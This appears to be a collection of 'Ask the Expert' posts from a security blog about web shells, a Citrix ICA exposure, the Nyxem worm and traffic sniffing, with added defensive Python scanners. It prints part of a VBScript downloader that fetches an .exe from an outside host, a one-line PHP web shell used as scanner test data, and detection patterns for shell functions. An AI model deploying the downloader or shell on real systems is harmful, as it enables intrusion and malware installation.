Posted on January 24th, 2008 by Administrator
Filed under: Ask the Expert | 18 Comments »
Q:
I have a webserver where I’ve found several different PHP shell scripts and I’d like to know how they got there. Are there known vulnerabilities that allow uploading of PHP files to a server?
I have several sites running on this server with several php script packages including…
Zencart
phpbb2
Any ideas or pointers will be appreciated!
A: Hi,
There are several vulnerabilities in both off-the-shelf products and custom PHP scripts that would allow “uploading”; in essence, they don’t need to upload, they just need to get your PHP scripts to execute an arbitrary (outside) PHP script.
PHPbb has several:
http://www.securiteam.com/cgi-bin/htsearch?sort=score&words=phpbb
Listed as Code Execution, Arbitrary File Upload, etc.
While zencart has just one problem:
http://www.securiteam.com/cgi-bin/htsearch?sort=score&words=zen+cart
But that could be misleading, and just mean that the software is very uncommon.
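As an added example (not part of the original answer), a small triage scanner for the situation described in this question: it scores PHP files under a web root for web-shell indicators and flags any PHP file that lives in a directory meant only for uploaded media. The file tree, indicator list and upload-directory paths are constructed assumptions, not taken from phpBB or Zen Cart.

```python
"""Web-shell triage over a (constructed) web root. Assumptions: file tree is a
dict path -> content, and UPLOAD_DIRS are directories that must never hold PHP."""
import re
from collections import namedtuple

Finding = namedtuple("Finding", "path score reasons")

# Constructed indicator list: (regex, weight, label). Weights are a heuristic.
INDICATORS = [
    (r"\beval\s*\(", 3, "eval()"),
    (r"base64_decode\s*\(", 2, "base64_decode()"),
    (r"\b(system|passthru|shell_exec|exec|popen)\s*\(", 3, "command execution"),
    (r"\$_(GET|POST|REQUEST|COOKIE)\s*\[", 1, "reads request parameter"),
    (r"move_uploaded_file\s*\(", 1, "accepts file uploads"),
    (r"(?i)c99|r57|webshell|backdoor", 3, "shell family name"),
]
# Assumed upload-only directories (avatar / image uploads); adjust to your layout.
UPLOAD_DIRS = ("images/avatars/upload", "images/uploads")


def scan_php(path, content):
    """Score one file; non-.php files are left at score 0."""
    score, reasons = 0, []
    if path.endswith(".php"):
        for pattern, weight, label in INDICATORS:
            if re.search(pattern, content):
                score += weight
                reasons.append(label)
        if any(path.startswith(d + "/") for d in UPLOAD_DIRS):
            score += 4
            reasons.append("PHP file inside upload-only directory")
    return Finding(path, score, reasons)


def triage(tree, threshold=4):
    """Return findings with score >= threshold, highest score first."""
    hits = (scan_php(p, c) for p, c in tree.items())
    return sorted((f for f in hits if f.score >= threshold), key=lambda f: -f.score)


# Constructed sample web root: one legitimate entry point, one avatar, one shell.
SAMPLE_TREE = {
    "index.php": "<?php require 'includes/application_top.php'; ?>",
    "images/avatars/upload/avatar_7.jpg": "\xff\xd8\xff",
    "images/avatars/upload/shell.php": "<?php eval(base64_decode($_POST['c'])); ?>",
    "forum/viewtopic.php": "<?php $id = (int)$_GET['t']; ?>",
}

if __name__ == "__main__":
    for f in triage(SAMPLE_TREE):
        print(f.score, f.path, ", ".join(f.reasons))
```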
Posted on October 5th, 2007 by Juha-Matti
Filed under: Ask the Expert, Commentary, Corporate Security, Google, Web | 2 Comments »
Mr. Petko D. ‘Acrobat-Gmail’ Petkov has reported a very interesting Citrix issue:
When querying for public .ICA files (Independent Computing Architecture) you can do serious things on the remote system with this information. Opening Cmd.exe and listing the file system works, etc. etc.
Report here and YouTube video of 1:28min here.
Googledork and Yahoodork(!) included, it appears there are many .mil and .gov sites. And hospitals too.
A real life example: A Finnish high school in Jyväskylä town fixed its problem in less than 20 minutes after receiving my e-mail this morning. Fine!
Posted on November 14th, 2006 by expert
Filed under: Ask the Expert, Microsoft, Virus | 10 Comments »
One of our customers has brought this HTML based malware to our attention:
[title][/title]
[head][/head]
[body]
[script language="VBScript"]
on error resume next
' due to how ajax works, the file MUST be within the same local domain
dl = "http://grupo-arroba.by.ru/grupo.exe"
' create adodbstream object
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str = "Microsoft.XMLHTTP"
Set x = df.CreateObject(str, "")
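As an added example (not part of the original post), a small analyser that pulls the indicators a defender wants from an HTML page carrying a VBScript downloader of the kind shown above: whether a VBScript block is present, whether it references the XMLHTTP class id from the sample, and which executable URLs it names for blocking. The sample page is constructed (the original post shows the tags with square brackets; here they are real tags) and the download host is a placeholder.

```python
"""Extract downloader indicators from an HTML page. Assumptions: the page is a
string, and the script block is a plain <script language="VBScript"> element."""
import re
from html.parser import HTMLParser

# Class id used in the sample above to host Microsoft.XMLHTTP from a VBScript.
XMLHTTP_CLSID = "BD96C556-65A3-11D0-983A-00C04FC29E36"


class ScriptCollector(HTMLParser):
    """Collect (language attribute, body text) for every <script> element."""

    def __init__(self):
        super().__init__()
        self.scripts, self._lang, self._buf = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._lang, self._buf = dict(attrs).get("language", "").lower(), []

    def handle_data(self, data):
        if self._lang is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._lang is not None:
            self.scripts.append((self._lang, "".join(self._buf)))
            self._lang = None


def analyse(html):
    """Return flags plus every quoted http(s) URL ending in .exe found in scripts."""
    p = ScriptCollector()
    p.feed(html)
    f = {"vbscript": False, "xmlhttp_clsid": False, "createobject": False, "urls": []}
    for lang, body in p.scripts:
        f["vbscript"] |= lang == "vbscript"
        f["xmlhttp_clsid"] |= XMLHTTP_CLSID.lower() in body.lower()
        f["createobject"] |= re.search(r"createobject\s*\(", body, re.I) is not None
        f["urls"] += re.findall(r'"(https?://[^"]+\.exe)"', body, re.I)
    # Verdict: a VBScript that instantiates XMLHTTP and names an executable to fetch.
    f["downloader"] = f["vbscript"] and f["xmlhttp_clsid"] and bool(f["urls"])
    return f


# Constructed sample page modelled on the snippet above; host is a placeholder.
SAMPLE_HTML = """<html><head><title></title></head><body>
<script language="VBScript">
on error resume next
dl = "http://malware-host.invalid/grupo.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
Set x = df.CreateObject("Microsoft.XMLHTTP", "")
</script></body></html>"""
```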
Posted on March 30th, 2006 by expert
Filed under: Ask the Expert | 2 Comments »
Q:
We recently had two sites defaced on our servers, and the perpetrators are claiming to have used TCPDump. Is there a cheap way to encrypt the data packets to ensure they can’t be sniffed? … [snipped]
- Rob
A:
The easiest way to encrypt data between you and the server is to use SSL or SSH. If you are connecting to a web server, enable SSL encryption; if you are connecting to a service that can be protected by SSL, enable it.
If you can’t use SSL encryption in your product, you can use OpenSSH for tunneling of traffic to the destination host, or use OpenVPN (SSL based) to encrypt the connection between you and the destination host.
Posted on March 27th, 2006 by expert
Filed under: Ask the Expert | 1 Comment »
Q:
Hope you can help with this question.
If a computer is infected with CME 24 will it attempt to attack a mapped network drive?
Not just delivering its payload.
Thanks
A:
Hi,
Let’s first try to understand what CME 24 is. CME – Common Malware Enumeration – is a relatively new standard in the way malware is identified and sorted.
CME allows different vendors, such as: Aladdin Knowledge Systems, Authentium, Avira, CA, ClamAV, ESET, Fortinet, Grisoft, H+BEDV, iDefense, Kaspersky, McAfee, Microsoft, TrojanDownloader, Norman, Panda, Sophos, Symantec, and Trend Micro to name the malware they identify in such a way that the user can know that the malware ‘X’ that company A has found is the same malware, named ‘Y’, that company B finds.
CME 24, which has also been named by the different vendors as:
Aladdin Knowledge Systems: Win32.Blackmal.e
Authentium: W32/Kapser.A@mm
AVIRA: Worm/KillAV.GR
CA: Win32/Blackmal.F
ESET: Win32/VB.NEI
Fortinet: W32/Grew.A!wm
F-Secure: Nyxem.E
Grisoft: Worm/Generic.FX
H+BEDV: Worm/KillAV.GR
Kaspersky: Email-Worm.Win32.Nyxem.e
McAfee: W32/MyWife.d@MM
Microsoft: Win32/Mywife.E@mm!CME-24
Norman: W32/Small.KI
Panda: W32/Tearec.A.worm
Sophos: W32/Nyxem-D
Symantec: W32.Blackmal.E@mm
TrendMicro: WORM_GREW.A
Destroy certain data files on an infected user’s machine on Friday, February 3, 2006.
According to our sources and independent analysis conducted on this worm, the code should have destroyed content on mapped drives. However, it is apparent that ITW (In the Wild) the worm’s payload does not function correctly, making it unable to destroy content found on mapped drives.
Posted on November 9th, 2005 by expert
Filed under: Ask the Expert | 1 Comment »
Q:
Hello -
I’m assessing the vulnerability of a web service application, and have been trying to find out whether this sort of scenario is possible, and if so, what to do about it.
Is there any sort of malware that could be installed on a user’s PC, such that it would intercept non-browser based HTTP requests (consisting of data to be PUT), send this data to a site run by the malware authors, and then issue the PUT to the intended web site? The effect being that the data is sent to the correct web site, but a copy is also sent to another location, unbeknownst to the user.
If this is possible, would HTTPS circumvent this?
I’ve searched and searched but cannot find anything addressing this.
A:
Hi,
What you are describing sounds like a Proxy server. In essence, proxies receive requests made by the user, send them to their original destination, receive the response from the destination and redirect that response to the user.
The use of PUT requests to implement this is the first time I have heard of it; however, it is not something that would be impossible to do.
For Proxy servers – HTTPS might trigger a warning on the part of the proxy as the certificate of the web site being accessed would be different from that of the proxy server from which you are receiving the HTTPS traffic back.
For Malware – As no traffic is being sent to the real destination, HTTPS or HTTP would make no difference. In both cases your traffic is being modified and possibly manipulated. Mozilla/IE might detect this manipulation or might not; I cannot be certain.